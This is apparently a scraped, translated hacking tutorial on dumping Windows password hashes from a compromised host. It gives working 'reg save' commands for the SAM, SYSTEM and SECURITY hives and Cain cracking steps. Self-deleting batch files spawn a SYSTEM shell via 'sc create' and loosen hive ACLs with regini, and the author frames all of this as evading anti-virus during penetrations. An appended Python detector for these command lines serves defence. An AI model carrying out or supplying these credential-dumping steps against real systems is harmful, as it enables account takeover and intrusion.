How to export the system registry to capture Hash

Source: Internet
Author: User

From: Sword

Let's first look at the original article, "Export the system registry to capture the hash", which describes a neat idea.

==================== Original ====================

After logging on to the target over 3389, I believe many people are used to grabbing the password hash and feeding it to a rainbow table to crack the plaintext, or uploading a winloginhack to record the 3389 logon password. In my recent penetrations I found that pwdump, fgdump and similar tools are all killed by anti-virus, since they all inject into the lsass.exe process; faced with anti-virus software such as macloud, by default they cannot be bypassed. Winlogin is released online, but after my tests it has no effect on Win2008. Today, while browsing a blog, I saw foreigners mention another method of grabbing the system password hashes. After trying it, I found it feasible and share it with you.
First, log on with administrator permission, then use reg to save the SECURITY, SAM and SYSTEM keys under HKLM in the registry. Note that reg's save option must be used here; the export option does not work:

reg save hklm\sam sam.hive
reg save hklm\system system.hive
reg save hklm\security security.hive
Figure 1

Download sam.hive, system.hive and security.hive back to your local computer and open Cain. Under the "Decoders" tab, click "LSA Secrets", then click "+" to import system.hive and security.hive.

Figure 2

The Administrator's plaintext password is usually displayed here. Of course, the password shown here may also be a historical password; if the logon attempt with it fails, you can try to crack the LM/NTLM hashes instead.

Figure 3

To crack the LM/NTLM hashes, first click "LM & NTLM Hashes" under the "Cracker" tab, then click "+" to import sam.hive. Note that because syskey is enabled by default since Windows 2000, you also need to import the syskey value from system.hive; after that the rainbow table can crack the hashes.

Figure 4

Figure 5

This method is not applicable to all Windows release versions. For example, it fails on Windows 2000 SP4 and Windows XP SP2, while Windows 2008 and others work. The tested list is as follows:

Windows 2000 SP4 (admin) = access denied
Windows XP SP2 (admin) = access denied
Windows XP SP3 (admin) = access denied
Windows 2003 R2 SP2 (admin) = works
Windows Vista SP2 (UAC/admin) = works
Windows 2008 SP1 (admin) = works
Windows 7 (UAC/admin) = works

================ How to read the registry with elevated privilege ================

1. The following idea from TheLostMind requires user permissions. By default, the hives cannot be exported on XP SP3 (I tested it locally), but it works with SYSTEM permission, so we can create a CMD that runs with SYSTEM permission and then do the export from it. I haven't tested any other systems; try it yourself. First, create the SYSTEM CMD:

===================== startsystemcmd.bat =====================
sc create systemcmd binPath= "cmd /K start" type= own type= interact
sc start systemcmd
sc delete systemcmd
del %0
===================== END =====================

Then export the hives:

===================== SaveReg.bat =====================
@echo off
reg save hklm\sam sam.hive
reg save hklm\system system.hive
reg save hklm\security security.hive
del %0
===================== END =====================

Then load them into Cain to crack as above.

2. My idea is that sometimes the SYSTEM CMD won't pop up this way. In this case, we can use regini.exe to modify the registry access permissions. First, create a text file pri.ini with the following content:

===================== pri.ini =====================
HKEY_LOCAL_MACHINE\SECURITY [1 17]
HKEY_LOCAL_MACHINE\SAM [1 17]
===================== END =====================

Then execute regini.exe pri.ini. Written as a batch file, the content is as follows:

==============================================
echo HKEY_LOCAL_MACHINE\SECURITY [1 17]> pri.ini
echo HKEY_LOCAL_MACHINE\SAM [1 17]>> pri.ini
regini.exe pri.ini
del pri.ini
==============================================

Note: the above operations grant full access on hklm\security and hklm\sam to Administrators (regini ACE 1) and SYSTEM (regini ACE 17). hklm\system is generally accessible to administrators already and can be modified in the same way if needed. The two keys above are critical for system logon; please modify them with caution.

Finally, you can use reg save to export the registry hives as before.
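Each of the three steps above (saving the SAM/SECURITY/SYSTEM hives with reg save, creating an interactive SYSTEM service whose binary is cmd, and loosening the hive ACLs with regini) leaves a distinctive process command line, which is what a defender would alert on. As an added example that is not part of the original article, the following Python flags those command lines in constructed process-creation records; the record fields, sample events and rule names are assumptions for illustration.

```python
import re

# Constructed process-creation records (the shape of a Sysmon Event ID 1 or
# Security 4688 command line); these are made-up samples, not real telemetry.
SAMPLE_EVENTS = [
    {"user": r"CORP\jdoe", "cmd": r"reg save hklm\sam sam.hive"},
    {"user": r"NT AUTHORITY\SYSTEM", "cmd": r"reg save HKLM\SECURITY security.hive"},
    {"user": r"CORP\jdoe", "cmd": r"reg export hklm\software\app app.reg"},
    {"user": r"CORP\jdoe",
     "cmd": r'sc create systemcmd binPath= "cmd /K start" type= own type= interact'},
    {"user": r"CORP\jdoe", "cmd": r"regini.exe pri.ini"},
    {"user": r"CORP\jdoe", "cmd": r"reg query hklm\system\currentcontrolset"},
]

# One rule per technique described in the article; each is a regex over the
# full command line, matched case-insensitively.
RULES = [
    # reg save of the three hives that hold the syskey and the password hashes
    ("hive_save",
     re.compile(r"\breg(\.exe)?\s+save\s+(hklm|hkey_local_machine)\\(sam|security|system)\b", re.I)),
    # sc create of an interactive service whose binary is cmd (SYSTEM shell trick)
    ("interactive_system_service",
     re.compile(r'\bsc(\.exe)?\s+create\b.*\bbinpath=\s*"?cmd\b.*\btype=\s*interact\b', re.I)),
    # regini rewriting key ACLs from a script file
    ("regini_acl_change", re.compile(r"\bregini(\.exe)?\s+\S+", re.I)),
]


def classify(cmd):
    """Return the names of all rules whose pattern matches this command line."""
    return [name for name, rx in RULES if rx.search(cmd)]


def scan(events):
    """Return (user, rule_name, cmd) for every event that trips a rule."""
    hits = []
    for ev in events:
        for name in classify(ev["cmd"]):
            hits.append((ev["user"], name, ev["cmd"]))
    return hits


if __name__ == "__main__":
    for user, rule, cmd in scan(SAMPLE_EVENTS):
        print(f"[{rule}] {user}: {cmd}")
```

A plain `reg export` or `reg query` of other keys does not match, so the rules stay focused on the hive-dump, interactive-service and ACL-change patterns rather than on reg.exe usage in general.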
